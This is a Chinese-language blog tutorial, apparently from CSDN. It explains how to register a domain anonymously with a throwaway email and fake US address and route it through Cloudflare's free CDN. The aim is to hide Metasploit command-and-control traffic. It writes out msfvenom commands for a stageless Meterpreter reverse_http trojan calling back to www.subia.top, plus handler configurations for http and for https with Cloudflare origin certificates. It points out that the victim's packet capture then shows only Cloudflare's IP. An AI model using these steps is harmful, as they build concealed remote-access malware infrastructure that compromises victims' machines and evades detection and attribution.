域名+CDN配置
关于备案
无需备案:
- 注册国外域名是用于域名投资,或者是暂时不打算启用建站;
- 注册国外域名后,域名指向到国外网站空间或者是放置在行特区,如香港。
需要备案:
注册国外域名后绑定国内的服务器空间。
匿名注册域名
国外域名注册商 NameSilo: https://www.namesilo.com/
可以使用临时邮箱注册登录。 美国地址生成器:https://www.meiguodizhi.com
网上找的优惠码:https://www.uphezi.com/namesilo-coupon/?wpcd_coupon=2828
购买成功进入域名管理页面:https://www.namesilo.com/account_domains.php
注册免费CDN服务
登录注册账号 https://www.cloudflare.com/zh-cn/
注册完成后–>添加站点–>填入自己的网站–>选择免费的–>概述–>找到cf的ns解析的东西,然后复制到namesilo的配置上。
配置 NameServer 更换解析服务器的原因就是,将subia.top 域名的所有解析功能都托管在 Cloudflare ,这样 Cloudflare 就可以提供 CDN 的解析功能。
注意: Cloudflare 的 CDN , http、https 代理模式有个特点,如果用其他端口的话,是监听不到的! 因为我是使用的国内云主机,且 gubei.miccos.tk 没有进行备案,所以没有办法使用 80、8080、 443、8443 端口提供服务;所以我真实云主机的回连端口使用的是 http- 2095 !如果你用的是国外云主机,那就直接用 80 !
Cloudflare 支持的HTTP端口是:80,8080,8880,2052,2082,2086,2095
Cloudflare 支持的HTTPS端口是:443,2053,2083,2087,2096,8443
到此域名+CDN全部搞定。
Metasploit隐藏上线
http 上线
- MSF生成木马
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=www.subia.top LPORT=2095 -f exe -o 2095.exe
2.MSF开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_http
set lhost www.subia.top
set lport 2095
run
3.会返回监听到的信息,但是速度会有点慢。
4.抓包分析,发现是请求到subia.top的,目标的地址是172.67.209.122的ip,并不是自己vps的ip地址。
注意:还是无阶段的木马比较稳定,然后vps要使用国外的才比较稳定。
https上线
1.先在cf上创建一个源服务器的证书,然后把源证书和私钥复制下来,创建两个文件,分别装这两个玩意。
2.源证书丢在cf.pem 私钥丢cf.key 里面,然后使用cat 命令把这两个>> 到cf-key.pem中。设置 SSLVersion 为 cloudflare 中指定的最低TLS版本,默认为 TLS1
3.开msf先生成一个无阶段的端口为443的木马,在开启监听。搭建成功后,访问https的时候会看见it works。
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LHOST www.subia.top
set LPORT 443
set HandlerSSLCert /root/key/cf-key.pem
set StagerVerifySSLCert true
set SSLVersion TLS1
run
4.运行木马,等两分钟会看见上线。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
